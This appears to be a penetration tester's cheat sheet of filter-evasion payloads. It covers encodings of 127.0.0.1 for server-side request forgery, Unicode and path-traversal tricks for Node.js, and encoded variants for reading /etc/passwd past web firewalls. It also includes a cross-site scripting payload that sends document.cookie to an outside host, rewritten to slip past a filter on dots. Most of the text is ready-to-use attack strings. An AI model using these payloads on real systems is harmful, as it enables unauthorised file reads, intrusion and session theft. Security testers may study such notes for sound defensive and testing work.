Table of contents
ip addresses
127.0.0.1 can also be represented as:
- 127.1
- 2130706433
- 0x7e000001
- 017700000001
- spoofed.burpcollaborator.net or registered DNS pointing to 127.0.0.1
- Or punycode
Unicode failure in nodejs
(U+FF2E)
http://test/\xFF\x2E\xFF\x2e/passwd
http://test/~~\xFF~~\x2E~~\xFF~~\x2e/passwd
http://test/../passwd
also works for \x0D\x0A ;) src: (portswigger)[]
GET /bff/proxy/stream/v1/users/me/streamItems/..\..\ HTTP/1.1
HTTP/1.1 403 Forbidden
change to
GET /bff/proxy/stream/v1/me/streamItems/web\..\.\..\ HTTP/1.1
{
"errors": [
{
"message": "Not Found",
"errorCode": 404,
...
src: sam surry
WAF BYPASS
(Waf bypass)[https://blog.isec.pl/waf-evasion-techniques/]
superfluous URL decode
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../../etc/passwd
or double encoded:
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
../../../etc/passwd
or non standard:
..%c0%af..%c0%af..%c0%afetc/passwd
or
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd
JavaScript objects
You can write
document.location='http://test?q='+document.cookie
as
window["document"]["location"]="http://test?q="+window["document"]["cookie"]
if the . (0x2e) is not allowed by the filters
More references
OWASP Filter Evasion portswigger XSS xheat sheet